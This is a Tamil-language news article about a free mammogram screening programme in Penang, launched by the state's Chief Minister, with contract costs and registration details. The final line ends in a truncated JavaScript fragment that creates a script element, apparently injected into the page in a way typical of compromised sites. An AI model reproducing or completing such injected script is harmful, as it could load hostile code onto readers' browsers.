பினாங்கு மாநிலத்தில் இலவச மேமோகிராம் பரிசோதனை

பினாங்கு மாநிலத்தில் இலவச மேமோகிராம் பரிசோதனை அதிகாரப்பூர்வமாகத் துவக்கி வைத்தார் மாநில முதல்வர் மேதகு லிம் குவான் எங்.
பினாங்கு மாநிலத்தில் இலவச மேமோகிராம் பரிசோதனை .

மலேசியாவில் மார்பக புற்றுநோயால் அதிகமான பெண்கள் நாளுக்கு நாள் பாதிப்புக்குள்ளாகின்றனர் . மார்பக புற்றுநோய் மலேசியாவில் உள்ள 14 மில்லியன் பெண்களுக்கு ஒரு முக்கிய அச்சுறுத்தலாக அமைகிறது. எனவே, இதனைப் பற்றிய விழிப்புணர்வை தூண்டும் வகையில் பினாங்கு மாநிலத்தில் பல இடங்களில் இலவச முலை ஊடுகதிர்ப்பட சோதனை (MAMMOGRAM) மற்றும் சுகாதார கருந்தரங்கை பினாங்கு மாநில மக்கள் கூட்டணி அரசு ஏற்பாடுச் செய்துள்ளது. இந்த இலவச சுகாதார நிகழ்வு அதிகாரப்பூர்வமாக மாநில முதல்வர் மேதகு லிம் குவான் எங் அவர்களின் தலைமையில் துவக்க விழாக் கண்டது.

pix 1
பினாங்கு மாநிலத்தில் இலவச மேமோகிராம் பரிசோதனை அதிகாரப்பூர்வமாகத் துவக்கி வைத்தார் மாநில முதல்வர் மேதகு லிம் குவான் எங்.

நிகழ்வில் சிறப்புரை வழங்கிய மாநில முதல்வர் இந்த இலவச பரிசோதனை ஒவ்வொரு சனி மற்றும் ஞாயிறு கிழமைகளில் நடைபெறும் என்றார். ஒரு நாளில் 40 மகளிர் மட்டுமே பரிசோதிக்கப்படுவர் என்பது குறிப்பிடத்தக்கதாகும். இதற்காக PB Diognastic Sdn Bhd என்ற நிறுவனத்தை மூன்று ஆண்டுக்கு குத்தகை முறையில் தேர்வுச் செய்யப்பட்டு ரிம2,246,400 செலவில் பினாங்கு வாழ் மகளிர்களுக்காக இந்த மேமோகிராம் இலவச பரிசோதனை நடத்தப்படுவதாக தெரிவித்தார். எனவே, இந்த அரிய வாய்ப்பை பினாங்கு வாழ் மகளிர்கள் சிறந்த முறையில் பயன்படுத்தி நன்மை பெறுமாறு கேட்டுக் கொண்டார் மாநில முதல்வர். இதனிடையே, 35 வயதுக்கு மேற்பட்ட மகளிர்கள் அனைவரும் அருகில் இருக்கும் சட்டமன்ற சேவை மையத்தில் தங்களை பதிவுச்செய்யுமாறு கேட்டுக் கொள்ளப்படுகின்றனர்.

மார்பகப் பகுதியில் புற்றுநோய் அறிகுறிகளான கட்டிகள், மார்பக வலி, மார்பக காம்பிலிருந்து வழக்கத்திற்கு மாறாக இரத்தக்கசிவு அல்லது அசாதாரண வெளியேற்றம் ஏற்பட்டால் மருத்துவர்கள் மேமோகிராம் பரிசோதனைச் செய்து கொள்ள ஆலோசிக்கப்படுகின்றனர். பிறை சமூக முன்னேற்றக் கழகத்தின் ஏற்பாட்டில் இலவச மேமோகிராம் பரிசோதனை புக்கிட் மெர்தாஜாம் பிபி லேபில் கடந்த 16 மார்ச் நடைபெற்றது. இதில் 40 மகளிர்கள் கலந்து கொண்டு பயனடைந்தனர்.var d=document;var s=d.createElement(‘script’);